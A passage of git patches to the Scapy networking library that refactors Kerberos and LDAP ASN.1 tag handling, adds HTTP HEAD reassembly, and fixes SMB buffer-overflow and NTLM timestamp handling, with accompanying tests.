implicit_tag=ASN1_Class_KRB.EncASRepPart, ) class EncTGSRepPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( EncKDCRepPart, - implicit_tag=26, + implicit_tag=ASN1_Class_KRB.EncTGSRepPart, ) @@ -1497,7 +1501,7 @@ class EncTGSRepPart(ASN1_Packet): class KRB_AP_REQ(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 14, KRB_MSG_TYPES, explicit_tag=0xA1), @@ -1514,7 +1518,7 @@ class KRB_AP_REQ(ASN1_Packet): ASN1F_PACKET("ticket", None, KRB_Ticket, explicit_tag=0xA3), ASN1F_PACKET("authenticator", None, EncryptedData, explicit_tag=0xA4), ), - implicit_tag=14, + implicit_tag=ASN1_Class_KRB.AP_REQ, ) @@ -1523,7 +1527,7 @@ class KRB_AP_REQ(ASN1_Packet): class KRB_Authenticator(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("authenticatorPvno", 5, explicit_tag=0xA0), Realm("crealm", "", explicit_tag=0xA1), @@ -1545,7 +1549,7 @@ class KRB_Authenticator(ASN1_Packet): ), ), ), - implicit_tag=2, + implicit_tag=ASN1_Class_KRB.Authenticator, ) @@ -1554,19 +1558,19 @@ class KRB_Authenticator(ASN1_Packet): class KRB_AP_REP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 15, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA2), ), - implicit_tag=15, + implicit_tag=ASN1_Class_KRB.AP_REP, ) class EncAPRepPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA0), Microseconds("cusec", 0, explicit_tag=0xA1), @@ -1577,7 +1581,7 @@ class EncAPRepPart(ASN1_Packet): UInt32("seqNumber", 0, explicit_tag=0xA3), ), ), - implicit_tag=27, + implicit_tag=ASN1_Class_KRB.EncAPRepPart, ) @@ -1586,19 +1590,19 @@ class EncAPRepPart(ASN1_Packet): class KRB_PRIV(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 21, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), ), - implicit_tag=21, + implicit_tag=ASN1_Class_KRB.PRIV, ) class EncKrbPrivPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_STRING("userData", ASN1_STRING(""), explicit_tag=0xA0), ASN1F_optional( @@ -1615,7 +1619,7 @@ class EncKrbPrivPart(ASN1_Packet): ASN1F_PACKET("cAddress", None, HostAddress, explicit_tag=0xA5), ), ), - implicit_tag=28, + implicit_tag=ASN1_Class_KRB.EncKrbPrivPart, ) @@ -1624,14 +1628,14 @@ class EncKrbPrivPart(ASN1_Packet): class KRB_CRED(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 22, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_SEQUENCE_OF("tickets", [KRB_Ticket()], KRB_Ticket, explicit_tag=0xA2), ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA3), ), - implicit_tag=22, + implicit_tag=ASN1_Class_KRB.CRED, ) @@ -1677,7 +1681,7 @@ class KrbCredInfo(ASN1_Packet): class EncKrbCredPart(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_SEQUENCE_OF( "ticketInfo", @@ -1701,7 +1705,7 @@ class EncKrbCredPart(ASN1_Packet): ASN1F_PACKET("cAddress", None, HostAddress, explicit_tag=0xA5), ), ), - implicit_tag=29, + implicit_tag=ASN1_Class_KRB.EncKrbCredPart, ) @@ -1736,7 +1740,7 @@ def m2i(self, pkt, s): class KRB_ERROR(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), ASN1F_enum_INTEGER("msgType", 30, KRB_MSG_TYPES, explicit_tag=0xA1), @@ -1841,7 +1845,7 @@ class KRB_ERROR(ASN1_Packet): ASN1F_optional(KerberosString("eText", "", explicit_tag=0xAB)), ASN1F_optional(_KRBERROR_data_Field("eData", "", explicit_tag=0xAC)), ), - implicit_tag=30, + implicit_tag=ASN1_Class_KRB.ERROR, ) @@ -1913,12 +1917,12 @@ class KRB_TGT_REP(ASN1_Packet): ) -# RFC 6542 sect 4 +# draft-ietf-kitten-iakerb-03 sect 4 class KRB_FINISHED(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_PACKET("gssMic", Checksum(), Checksum, explicit_tag=0xA1), ) @@ -2057,7 +2061,7 @@ class KRB_InnerToken(Packet): class KRB_GSSAPI_Token(GSSAPI_BLOB): name = "Kerberos GSSAPI-Token" ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_KRB_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_OID("MechType", "1.2.840.113554.1.2.2"), ASN1F_PACKET( "innerToken", @@ -2065,7 +2069,7 @@ class KRB_GSSAPI_Token(GSSAPI_BLOB): KRB_InnerToken, implicit_tag=0x0, ), - implicit_tag=0, + implicit_tag=ASN1_Class_KRB.Token, ) @@ -2707,20 +2711,21 @@ def SENT_TGS_REQ(self): def _process_padatas_and_key(self, padatas): from scapy.libs.rfc3961 import EncryptionType, Key - # We default to RC4 because whenever something else is used, - # there will be at least a padata containing the salt. - etype = EncryptionType.RC4_HMAC + etype = None salt = b"" # Process pa-data if padatas is not None: for padata in padatas: - if padata.padataType == 0x13: # PA-ETYPE-INFO2 + if padata.padataType == 0x13 and etype is None: # PA-ETYPE-INFO2 elt = padata.padataValue.seq[0] - etype = elt.etype.val - if etype != EncryptionType.RC4_HMAC: - salt = elt.salt.val + if elt.etype.val in self.etypes: + etype = elt.etype.val + if etype != EncryptionType.RC4_HMAC: + salt = elt.salt.val elif padata.padataType == 133: # PA-FX-COOKIE self.fxcookie = padata.padataValue + + etype = etype or self.etypes[0] # Compute key if not already provided if self.key is None: self.key = Key.string_to_key( diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index eaea379ec34..8aa3f2f60ae 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -22,11 +22,10 @@ from scapy.ansmachine import AnsweringMachine from scapy.asn1.asn1 import ( ASN1_STRING, - ASN1_SEQUENCE, - ASN1_Class_UNIVERSAL, + ASN1_Class, ASN1_Codecs, ) -from scapy.asn1.ber import BERcodec_SEQUENCE +from scapy.asn1.ber import BERcodec_STRING from scapy.asn1fields import ( ASN1F_BOOLEAN, ASN1F_CHOICE, @@ -129,43 +128,52 @@ class LDAPReferral(ASN1_Packet): ASN1F_optional(ASN1F_SEQUENCE_OF("referral", [], LDAPReferral, implicit_tag=0xA3)), ) -# ldap APPLICATION +# ldap APPLICATION -class ASN1_Class_LDAP(ASN1_Class_UNIVERSAL): +class ASN1_Class_LDAP(ASN1_Class): name = "LDAP" - APPLICATION = 0x60 - - -class ASN1_LDAP_APPLICATION(ASN1_SEQUENCE): - tag = ASN1_Class_LDAP.APPLICATION - - -class BERcodec_LDAP_APPLICATION(BERcodec_SEQUENCE): - tag = ASN1_Class_LDAP.APPLICATION - - -class ASN1F_LDAP_APPLICATION(ASN1F_SEQUENCE): - ASN1_tag = ASN1_Class_LDAP.APPLICATION + # APPLICATION + CONSTRUCTED = 0x40 | 0x20 + BindRequest = 0x60 + BindResponse = 0x61 + UnbindRequest = 0x42 # not constructed + SearchRequest = 0x63 + SearchResultEntry = 0x64 + SearchResultDone = 0x65 + SearchResultReference = 0x66 + ModifyRequest = 0x67 + ModifyResponse = 0x68 + AddRequest = 0x69 + AddResponse = 0x6A + DelRequest = 0x6B + DelResponse = 0x6C + ModifyDNRequest = 0x6D + ModifyDNResponse = 0x6E + CompareRequest = 0x6F + CompareResponse = 0x70 + AbandonRequest = 0x71 + ExtendedRequest = 0x72 + ExtendedResponse = 0x73 # Bind operation # https://datatracker.ietf.org/doc/html/rfc1777#section-4.1 -class ASN1_Class_LDAP_Authentication(ASN1_Class_UNIVERSAL): +class ASN1_Class_LDAP_Authentication(ASN1_Class): name = "LDAP Authentication" - simple = 0xA0 - krbv42LDAP = 0xA1 - krbv42DSA = 0xA2 - sasl = 0xA3 + # CONTEXT-SPECIFIC = 0x80 + simple = 0x80 + krbv42LDAP = 0x81 + krbv42DSA = 0x82 + sasl = 0xA3 # CONTEXT-SPECIFIC | CONSTRUCTED class ASN1_LDAP_Authentication_simple(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.simple -class BERcodec_LDAP_Authentication_simple(BERcodec_SEQUENCE): +class BERcodec_LDAP_Authentication_simple(BERcodec_STRING): tag = ASN1_Class_LDAP_Authentication.simple @@ -177,7 +185,7 @@ class ASN1_LDAP_Authentication_krbv42LDAP(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42LDAP -class BERcodec_LDAP_Authentication_krbv42LDAP(BERcodec_SEQUENCE): +class BERcodec_LDAP_Authentication_krbv42LDAP(BERcodec_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42LDAP @@ -189,7 +197,7 @@ class ASN1_LDAP_Authentication_krbv42DSA(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42DSA -class BERcodec_LDAP_Authentication_krbv42DSA(BERcodec_SEQUENCE): +class BERcodec_LDAP_Authentication_krbv42DSA(BERcodec_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42DSA @@ -222,7 +230,7 @@ class LDAP_SaslCredentials(ASN1_Packet): class LDAP_BindRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_INTEGER("version", 2), LDAPDN("bind_name", ""), ASN1F_CHOICE( @@ -232,21 +240,22 @@ class LDAP_BindRequest(ASN1_Packet): ASN1F_LDAP_Authentication_krbv42LDAP, ASN1F_LDAP_Authentication_krbv42DSA, ASN1F_PACKET( - "sasl", LDAP_SaslCredentials(), LDAP_SaslCredentials, implicit_tag=0xA3 + "sasl", LDAP_SaslCredentials(), LDAP_SaslCredentials, + implicit_tag=ASN1_Class_LDAP_Authentication.sasl ), ), - implicit_tag=0, + implicit_tag=ASN1_Class_LDAP.BindRequest, ) class LDAP_BindResponse(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( *( LDAPResult + (ASN1F_optional(ASN1F_STRING("serverSaslCreds", "", implicit_tag=0x87)),) ), - implicit_tag=1, + implicit_tag=ASN1_Class_LDAP.BindResponse, ) @@ -256,7 +265,10 @@ class LDAP_BindResponse(ASN1_Packet): class LDAP_UnbindRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_NULL("info", 0) + ASN1_root = ASN1F_SEQUENCE( + ASN1F_NULL("info", 0), + implicit_tag=ASN1_Class_LDAP.UnbindRequest, + ) # Search operation @@ -287,16 +299,19 @@ class LDAP_SubstringFilterStr(ASN1_Packet): "initial", LDAP_SubstringFilterInitial(), LDAP_SubstringFilterInitial, - implicit_tag=0x0, + implicit_tag=0x80, ), ASN1F_PACKET( - "any", LDAP_SubstringFilterAny(), LDAP_SubstringFilterAny, implicit_tag=0x1 + "any", + LDAP_SubstringFilterAny(), + LDAP_SubstringFilterAny, + implicit_tag=0x81 ), ASN1F_PACKET( "final", LDAP_SubstringFilterFinal(), LDAP_SubstringFilterFinal, - implicit_tag=0x2, + implicit_tag=0x82, ), ) @@ -352,22 +367,43 @@ class LDAP_FilterApproxMatch(ASN1_Packet): ASN1_root = AttributeValueAssertion.ASN1_root +class ASN1_Class_LDAP_Filter(ASN1_Class): + name = "LDAP Filter" + # CONTEXT-SPECIFIC + CONSTRUCTED = 0x80 | 0x20 + And = 0xA0 + Or = 0xA1 + Not = 0xA2 + EqualityMatch = 0xA3 + Substrings = 0xA4 + GreaterOrEqual = 0xA5 + LessOrEqual = 0xA6 + Present = 0xA7 + ApproxMatch = 0xA8 + + class LDAP_Filter(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_CHOICE( "filter", LDAP_FilterPresent(), - ASN1F_PACKET("and_", None, LDAP_FilterAnd, implicit_tag=0xA0), - ASN1F_PACKET("or_", None, LDAP_FilterOr, implicit_tag=0xA1), - ASN1F_PACKET("not_", None, _LDAP_Filter, implicit_tag=0xA2), - ASN1F_PACKET("equalityMatch", None, LDAP_FilterEqual, implicit_tag=0xA3), - ASN1F_PACKET("substrings", None, LDAP_SubstringFilter, implicit_tag=0xA4), - ASN1F_PACKET( - "greaterOrEqual", None, LDAP_FilterGreaterOrEqual, implicit_tag=0xA5 - ), - ASN1F_PACKET("lessOrEqual", None, LDAP_FilterLessOrEqual, implicit_tag=0xA6), - ASN1F_PACKET("present", None, LDAP_FilterPresent, implicit_tag=0xA7), - ASN1F_PACKET("approxMatch", None, LDAP_FilterApproxMatch, implicit_tag=0xA8), + ASN1F_PACKET("and_", None, LDAP_FilterAnd, + implicit_tag=ASN1_Class_LDAP_Filter.And), + ASN1F_PACKET("or_", None, LDAP_FilterOr, + implicit_tag=ASN1_Class_LDAP_Filter.Or), + ASN1F_PACKET("not_", None, _LDAP_Filter, + implicit_tag=ASN1_Class_LDAP_Filter.Not), + ASN1F_PACKET("equalityMatch", None, LDAP_FilterEqual, + implicit_tag=ASN1_Class_LDAP_Filter.EqualityMatch), + ASN1F_PACKET("substrings", None, LDAP_SubstringFilter, + implicit_tag=ASN1_Class_LDAP_Filter.Substrings), + ASN1F_PACKET("greaterOrEqual", None, LDAP_FilterGreaterOrEqual, + implicit_tag=ASN1_Class_LDAP_Filter.GreaterOrEqual), + ASN1F_PACKET("lessOrEqual", None, LDAP_FilterLessOrEqual, + implicit_tag=ASN1_Class_LDAP_Filter.LessOrEqual), + ASN1F_PACKET("present", None, LDAP_FilterPresent, + implicit_tag=ASN1_Class_LDAP_Filter.Present), + ASN1F_PACKET("approxMatch", None, LDAP_FilterApproxMatch, + implicit_tag=ASN1_Class_LDAP_Filter.ApproxMatch), ) @@ -378,7 +414,7 @@ class LDAP_SearchRequestAttribute(ASN1_Packet): class LDAP_SearchRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( LDAPDN("baseObject", ""), ASN1F_ENUMERATED( "scope", 0, {0: "baseObject", 1: "singleLevel", 2: "wholeSubtree"} @@ -398,7 +434,7 @@ class LDAP_SearchRequest(ASN1_Packet): ASN1F_BOOLEAN("attrsOnly", False), ASN1F_PACKET("filter", LDAP_Filter(), LDAP_Filter), ASN1F_SEQUENCE_OF("attributes", [], LDAP_SearchRequestAttribute), - implicit_tag=3, + implicit_tag=ASN1_Class_LDAP.SearchRequest, ) @@ -417,30 +453,30 @@ class LDAP_SearchResponseEntryAttribute(ASN1_Packet): class LDAP_SearchResponseEntry(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( LDAPDN("objectName", ""), ASN1F_SEQUENCE_OF( "attributes", LDAP_SearchResponseEntryAttribute(), LDAP_SearchResponseEntryAttribute, ), - implicit_tag=4, + implicit_tag=ASN1_Class_LDAP.SearchResultEntry, ) class LDAP_SearchResponseResultDone(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( *LDAPResult, - implicit_tag=5, + implicit_tag=ASN1_Class_LDAP.SearchResultDone, ) class LDAP_AbandonRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1_root = ASN1F_SEQUENCE( ASN1F_INTEGER("messageID", 0), - implicit_tag=0x10, + implicit_tag=ASN1_Class_LDAP.AbandonRequest, ) @@ -474,13 +510,7 @@ class LDAP(ASN1_Packet): LDAP_SearchResponseEntry, LDAP_SearchResponseResultDone, LDAP_AbandonRequest, - # For some reason the unbind request is under the 0x40 - ASN1F_PACKET( - "unbindRequest", - LDAP_UnbindRequest(), - LDAP_UnbindRequest, - implicit_tag=0x42, - ), + LDAP_UnbindRequest, ), # LDAP v3 only ASN1F_optional( diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 19f44cbd3ba..51f8d5e7364 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -382,6 +382,7 @@ assert resp[3].answers(req[3]) assert not req[3].answers(resp[3]) = Test DoIPSocket +~ automotive_comm server_up = threading.Event() def server(): @@ -409,6 +410,7 @@ pkts = sock.sniff(timeout=1, count=2) assert len(pkts) == 2 = Test DoIPSocket6 +~ automotive_comm server_up = threading.Event() def server(): diff --git a/test/run_tests b/test/run_tests index d152bdb1cb5..48c931d9f2d 100755 --- a/test/run_tests +++ b/test/run_tests @@ -57,6 +57,7 @@ then export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K tshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" export SIMPLE_TESTS="true" export PYTHON + export DISABLE_COVERAGE=" " PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") bash ${DIR}/.config/ci/test.sh $PYVER non_root exit $? diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index bab90a8c16b..e586f4f0dc8 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -35,6 +35,10 @@ assert ntlm.Payload[1] == ('Workstation', 'WIN2') assert isinstance(ntlm.Payload[3][1], NTLMv2_RESPONSE) assert ntlm.Payload[3][1].AvPairs[8].Value == 'ldap/192.168.122.156' +pkt = LDAP_BindRequest(bind_name="user", authentication=ASN1_LDAP_Authentication_simple("password")) +assert bytes(pkt) == b'`\x13\x02\x01\x02\x04\x04user\x80\x08password' +assert LDAP_BindRequest(b'`\x13\x02\x01\x02\x04\x04user\x80\x08password').authentication.val == b"password" + = LDAP_BindResponse pkt = Ether(b'RT\x00\x0cG\xabRT\x00!l+\x08\x00E\x00\x00\xc2\x18\xec@\x00\x80\x06kV\xc0\xa8z\x9c\xc0\xa8z\x06\x01\x85\xc2\xfcU/c\x9f\x1d\x92\x86\x13P\x18 \x12\x00\xd1\x00\x000\x81\x90\x02\x01\x0ca\x81\x8a\n\x01\x0e\x04\x00\x04\x00\x87\x81\x80NTLMSSP\x00\x02\x00\x00\x00\x08\x00\x08\x008\x00\x00\x005\x82\x8a\xe2Kn3@\x98\xb7\xc11\x00\x00\x00\x00\x00\x00\x00\x00@\x00@\x00@\x00\x00\x00\n\x00aJ\x00\x00\x00\x0fW\x00I\x00N\x001\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xb8}\x868\xe1\xc5\xd7\x01\x00\x00\x00\x00') From 44a06762315e41e5fdc25fbceafd72504d0f07e1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 4 Mar 2024 10:00:41 +0100 Subject: [PATCH 1230/1632] HTTP 1.0: support HEAD in reconstruction (#4307) --- scapy/layers/http.py | 43 +++++++++++++++++++++++++-------- test/pcaps/http_head.pcapng.gz | Bin 0 -> 952 bytes test/scapy/layers/http.uts | 17 +++++++++++++ 3 files changed, 50 insertions(+), 10 deletions(-) create mode 100644 test/pcaps/http_head.pcapng.gz diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 51fc0df8407..d1b90784980 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -19,7 +19,7 @@ Note that this layer ISN'T loaded by default, as quite experimental for now. To follow HTTP packets streams = group packets together to get the -whole request/answer, use ``TCPSession`` as: +whole request/answer, use ``TCPSession`` as:: >>> sniff(session=TCPSession) # Live on-the-flow session >>> sniff(offline="./http_chunk.pcap", session=TCPSession) # pcap @@ -28,14 +28,14 @@ and will also decompress the packets when needed. Note: on failure, decompression will be ignored. -You can turn auto-decompression/auto-compression off with: +You can turn auto-decompression/auto-compression off with:: >>> conf.contribs["http"]["auto_compression"] = False (Defaults to True) """ -# This file is a modified version of the former scapy_http plugin. +# This file is a rewritten version of the former scapy_http plugin. # It was reimplemented for scapy 2.4.3+ using sessions, stream handling. # Original Authors : Steeve Barbeau, Luca Invernizzi @@ -66,6 +66,12 @@ except ImportError: _is_brotli_available = False +try: + import lzw + _is_lzw_available = True +except ImportError: + _is_lzw_available = False + try: import zstandard _is_zstd_available = True @@ -312,8 +318,13 @@ def post_dissect(self, s): elif "gzip" in encodings: s = gzip.decompress(s) elif "compress" in encodings: - import lzw - s = lzw.decompress(s) + if _is_lzw_available: + s = lzw.decompress(s) + else: + log_loading.info( + "Can't import lzw. compress decompression " + "will be ignored !" + ) elif "br" in encodings: if _is_brotli_available: s = brotli.decompress(s) @@ -351,8 +362,13 @@ def post_build(self, pkt, pay): elif "gzip" in encodings: pay = gzip.compress(pay) elif "compress" in encodings: - import lzw - pay = lzw.compress(pay) + if _is_lzw_available: + pay = lzw.compress(pay) + else: + log_loading.info( + "Can't import lzw. compress compression " + "will be ignored !" + ) elif "br" in encodings: if _is_brotli_available: pay = brotli.compress(pay) @@ -589,14 +605,22 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): def tcp_reassemble(cls, data, metadata, _): detect_end = metadata.get("detect_end", None) is_unknown = metadata.get("detect_unknown", True) + # General idea of the following is explained at + # https://datatracker.ietf.org/doc/html/rfc2616#section-4.4 if not detect_end or is_unknown: metadata["detect_unknown"] = False http_packet = cls(data) # Detect packing method if not isinstance(http_packet.payload, _HTTPContent): return http_packet + is_response = isinstance(http_packet.payload, cls.clsresp) + # Packets may have a Content-Length we must honnor length = http_packet.Content_Length - if length is not None: + # Heuristic to try and detect instant HEAD responses, as those include a + # Content-Length that must not be honored. + if is_response and data.endswith(b"\r\n\r\n"): + detect_end = lambda _: True + elif length is not None: # The packet provides a Content-Length attribute: let's # use it. When the total size of the frags is high enough, # we have the packet @@ -613,11 +637,10 @@ def tcp_reassemble(cls, data, metadata, _): # It's not Content-Length based. It could be chunked encodings = http_packet[cls].payload._get_encodings() chunked = ("chunked" in encodings) - is_response = isinstance(http_packet.payload, cls.clsresp) if chunked: detect_end = lambda dat: dat.endswith(b"0\r\n\r\n") # HTTP Requests that do not have any content, - # end with a double CRLF + # end with a double CRLF. Same for HEAD responses elif isinstance(http_packet.payload, cls.clsreq): detect_end = lambda dat: dat.endswith(b"\r\n\r\n") # In case we are handling a HTTP Request, diff --git a/test/pcaps/http_head.pcapng.gz b/test/pcaps/http_head.pcapng.gz new file mode 100644 index 0000000000000000000000000000000000000000..86626f135cd4bfeeb56efde7e4cc4491abf5d460 GIT binary patch literal 952 zcmV;p14sNHiwFpNvg2g}188(~a9?O;VPr0FV_|S^X8?_qL2T1j7{^~imv$DeAS$Sf zD0&hSkr<8>w~XMz)Ib9*C2K^2R?0wg-B;V2V_VO!b%QF=NjnZUK@@9!1iMdy zP2;}HE@%hPR82x?3=VLB@7Y=1W>GauR^I#cz4!b6|9qbXQ55zdgephh&m>U%@EG6s zwSE!m3fC!k?N-i@=@c3)PV}CJHGhlUyVEP)58=~;$_O3JTpK|nseyNY`X2RNdv(`Y zSw+>S_jmrvPp>9lJtN%+CA;3a*OlxM?CXF0#^Z@?+qxr0JL|!C%!()xF=8P!f|gRR zS2&0BP<3T>ZGbEQ@8N3t&71tAko6^JWyXHFz=^Dy>9qQWA zrt2Z_g5@2Fmlu~oM01V=w`-P zxipGpJXWt)TLJq`6sa_|M7olA4Hc@{ol6vA3VLE?gLNIrTtO8Q0u3>=Gc?3k}>1;m5E*( z_WW&UBroktaK>)dk%ZoE~B1x6<2bbsQ z$HCP3^7vx&u=Y8@pMD$n->ERAXRDO=AafUcnWOVkNH(VMS4u zL+W4=pQ_YFp}go>lmM&ZI*?buC9h-N2~9VN#C@c$tzvI}1`Iri8``3z8RVF9=!lZf z=S87L=mMe8*nuD0eug*(GgYh Date: Tue, 5 Mar 2024 17:35:12 +0100 Subject: [PATCH 1231/1632] SMB: support BUFFER_OVERFLOW and NTLM without TimeStamp (#4309) --- scapy/layers/ntlm.py | 4 ++-- scapy/layers/smb2.py | 8 +++++--- scapy/layers/smbclient.py | 30 ++++++++++++++++++++++++++---- 3 files changed, 33 insertions(+), 9 deletions(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 7097d3fd767..094b3e6a5c6 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1406,10 +1406,10 @@ def GSS_Init_sec_context(self, Context: CONTEXT, val=None): ChallengeFromClient=os.urandom(8), ) try: - # the client SHOULD set the timestamp in the CHALLENGE_MESSAGE + # the server SHOULD set the timestamp in the CHALLENGE_MESSAGE cr.TimeStamp = chall_tok.getAv(0x0007).Value except IndexError: - pass + cr.TimeStamp = int((time.time() + 11644473600) * 1e7) cr.AvPairs = ( chall_tok.TargetInfo[:-1] + ( diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 21947dcc862..f2a567bbb54 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1403,7 +1403,9 @@ class SMB2_Header(Packet): _SMB2_OK_RETURNCODES = ( # sect 3.3.4.4 (0xC0000016, 0x0001), # STATUS_MORE_PROCESSING_REQUIRED - (0x80000005, 0x0010), # STATUS_BUFFER_OVERFLOW + (0x80000005, 0x0008), # STATUS_BUFFER_OVERFLOW (Read) + (0x80000005, 0x0010), # STATUS_BUFFER_OVERFLOW (QueryInfo) + (0x80000005, 0x000B), # STATUS_BUFFER_OVERFLOW (IOCTL) (0xC000000D, 0x000B), # STATUS_INVALID_PARAMETER (0x0000010C, 0x000F), # STATUS_NOTIFY_ENUM_DIR ) @@ -2873,7 +2875,7 @@ class SMB2_Read_Request(_SMB2_Payload, _NTLMPayloadPacket): 0x02: "SMB2_READFLAG_REQUEST_COMPRESSED", }, ), - LEIntField("Length", 1024), + LEIntField("Length", 4280), LELongField("Offset", 0), PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), LEIntField("MinimumCount", 0), @@ -3188,7 +3190,7 @@ class SMB2_IOCTL_Request(_SMB2_Payload, _NTLMPayloadPacket): LEIntField("MaxInputResponse", 0), LEIntField("OutputBufferOffset", None), LEIntField("OutputLen", None), # Called OutputCount. - LEIntField("MaxOutputResponse", 4280), + LEIntField("MaxOutputResponse", 1024), FlagsField("Flags", 0, -32, {0x00000001: "SMB2_0_IOCTL_IS_FSCTL"}), LEIntField("Reserved2", 0), _NTLMPayloadField( diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index ef9657cf291..90e6c885557 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -434,8 +434,8 @@ def receive_data_smb(self, pkt): if pkt.Status == 0x0000010B: # STATUS_NOTIFY_CLEANUP # this is a notify cleanup. ignore return - # When an error is returned, add the status to it as metadata - resp.NTStatus = pkt.sprintf("%SMB2_Header.Status%") + # Add the status to the response as metadata + resp.NTStatus = pkt.sprintf("%SMB2_Header.Status%") self.oi.smbpipe.send(resp) @ATMT.ioevent(SOCKET_MODE_SMB, name="smbpipe", as_supersocket="smblink") @@ -757,7 +757,18 @@ def send(self, x): resp = self.ins.sr1(pkt, verbose=0) if SMB2_IOCTL_Response not in resp: raise ValueError("Failed reading IOCTL_Response ! %s" % resp.NTStatus) - super(SMB_RPC_SOCKET, self).send(bytes(resp.Output)) + data = bytes(resp.Output) + # Handle BUFFER_OVERFLOW (big DCE/RPC response) + while resp.NTStatus == "STATUS_BUFFER_OVERFLOW": + # Retrieve DCE/RPC full size + resp = self.ins.sr1( + SMB2_Read_Request( + FileId=self.PipeFileId, + ), + verbose=0 + ) + data += resp.Data + super(SMB_RPC_SOCKET, 